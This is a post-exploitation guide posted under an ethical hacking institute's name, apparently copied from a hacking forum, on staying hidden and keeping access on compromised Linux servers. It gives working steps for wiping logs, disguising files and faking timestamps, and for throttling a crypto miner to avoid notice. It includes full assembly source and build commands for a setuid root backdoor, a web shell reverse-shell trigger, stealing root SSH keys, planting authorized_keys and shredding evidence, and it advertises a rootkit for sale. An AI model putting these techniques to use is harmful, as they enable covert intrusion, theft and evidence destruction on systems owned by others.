Extreme Hacking | Sadik Shaikh
Ethical Hacking Institute Course in Pune-India
Introduction
Post-exploitation can basically be divided into two parts.
The first is stealth, and the second is persistence. You could argue exfiltration is another part, but I don’t think it’s necessarily the case. Stealth encompasses the techniques you use to avoid being found by any sysadmins, and persistence encompasses retaining access to the server.
Stealth is not an easy thing, and people screw it up a lot.
Stealth can really be divided into three parts:
- Wiping logs
- Hiding your files
- Not being loud
Wiping logs
When we talk about wiping logs, I don’t mean deleting the files that store the logs. A lot of people just rm /var/log/wtmp and /var/log/lastlog and think THAT’S FINE, NOBODY WILL NOTICE THAT.
It’s not fine.
Anyone will notice that.
I recommend instead you search for a well-written, powerful log cleaner. There are plenty of them out there, and one of the ones I recommend would be the Last Door Log Wiper. It’s available on Packetstorm; I would post the link, but I seem to need more posts for that.
That said, there are actually quite a few of them out there, and it’s worth looking around and seeing what you can see, and what feels best for you. Packetstorm is a good place to look for more oldschool-style tools like log wipers.
Hiding your files
Don’t just create a directory called /tmp/.hidden. Everything in the world searches for hidden directories in /tmp/ now, because most of the time, they are bad news. Look at /var/tmp/, if it’s not sym-linked to /tmp/. See what other locations you can write to. A command to find them is:
Quote:find / -perm -0002 -type d -print
The less obvious the location, the better it is to hide them. Also, the less obvious the name, the better. Don’t call them things like sshscan, or bruteforce, or the ever-popular “x”. Call them things like libc.so.2.
Also, something that will help you is googling this: thegeekstuff linux touch command timestamp
The page that brings you to, on thegeekstuff site, will teach you how to change file timestamps in Linux using only the touch command, which is sufficient to fool 95% of sysadmins.
Also, you should consider investing in a good rootkit. If you check my threads, you’ll see that I’m offering a private one at a very reasonable price!
Don’t be loud
If you’re going to run a bitcoin miner, don’t run it constantly. Instead, wrap it in a script that checks if anyone is logged in first, because otherwise, somebody is going to notice you and your 100% CPU usage.
Don’t run constant port/SSH scans from the box. That’s a good way to lose access.
Don’t DROP TABLES or rm things out of frustration. Come here and ask for help if you’re having problems.
If you DO have to rm something, please remember to shred it instead of using rm. The syntax to use is shred -fuz FILENAME. This replaces the entire file with 0s on the drive, and prevents it being forensically recovered.
Persistence is hard. I’m going to give a few tips and recommend a few techniques.
The first technique I’d recommend is putting a setuid binary somewhere. It’s always useful to have a way to gain root even if you lose access to the root user somehow.
I’m going to give you some source code for a simple setuid wrapper for bash written in x86 assembly:
Quote:section .text
global beginbegin:
xor eax, eax
xor ebx, ebx
mov ebx, 0
mov eax, 0x17
int 0x80
mov ebx, bash
mov eax, 0xb
xor ecx, ecx
xor edx, edx
int 0x80section .data
bash DB “/bin/bash”
To assemble this, use nasm. The syntax is:
Quote:nasm -f elf -o /tmp/back1 backdoor.s
where backdoor.s is your assembly code file. Once you’ve done that, you need to use ld to link it. If you’re on a 32bit machine (i686 aka x86), you just run:
Quote:ld -e begin -o /tmp/backdoor /tmp/back1
If you are on a 64bit machine, the command is much the same, but needs an extra argument:
Quote:ld -melf_i386 -e begin -o /tmp/backdoor /tmp/back1
The binary this produces is small, convenient, and very portable. It will run on any Linux, without ever needing to be re-assembled. To use it, all you need to do is chown root:root it, and then chmod a+sx it.
When it comes to retaining access through a webshell, a good option may be to add a line of code to an existing file that triggers a reverse shell when you visit the page with a certain parameter, for example, site.site/index.php?rev=1.3.3.7 would send a shell back to 1.3.3.7. Always use a low port for your reverse shell handlers; for example, 443 and 80. These allow you to evade firewalls, and they look far less suspicious in netstat. There is an extremely popular list of simple reverse shells at pentestmonkey’s site; simply google pentestmonkey reverse shells.
Always consider either a) stealing root’s SSH keys (available in /root/.ssh/id_rsa), and adding your own SSH keys to the authorized_keys file in /root/.ssh/ (or other user’s authorized_keys files). This allows you to login without needing a password. Also think about using the extended filesystem attributes on these files; by running
Quote:chattr +is /root/.ssh/authorized_keys
you essentially make the file unable to be deleted or modified, HOWEVER, this may alert a sysadmin if he makes regular modifications to this file.
Another thing to consider is a good rootkit. Most of the public rootkits these days are either old, or userland. You can experiment with them, but if I may make a recommendation, in my list of threads is a very reasonable rootkit available for a very reasonable price.
Conclusion
The best way to retain access is to get experience. You need to develop your own ideas and experience using lots of tools.
www.extremehacking.org
CEHv9 CHFI ECSAv9 CAST ENSA CCNA CCNA SECURITY MCITP RHCE CHECKPOINT ASA FIREWALL VMWARE CLOUD ANDROID IPHONE NETWORKING HARDWARE TRAINING INSTITUTE IN PUNE,Certified Ethical Hacking, Center For Advanced Security Training in India, ceh v9 course in Pune-India,ceh certification in pune-India, ceh v9 training in Pune-India,Ethical Hacking Course in Pune-India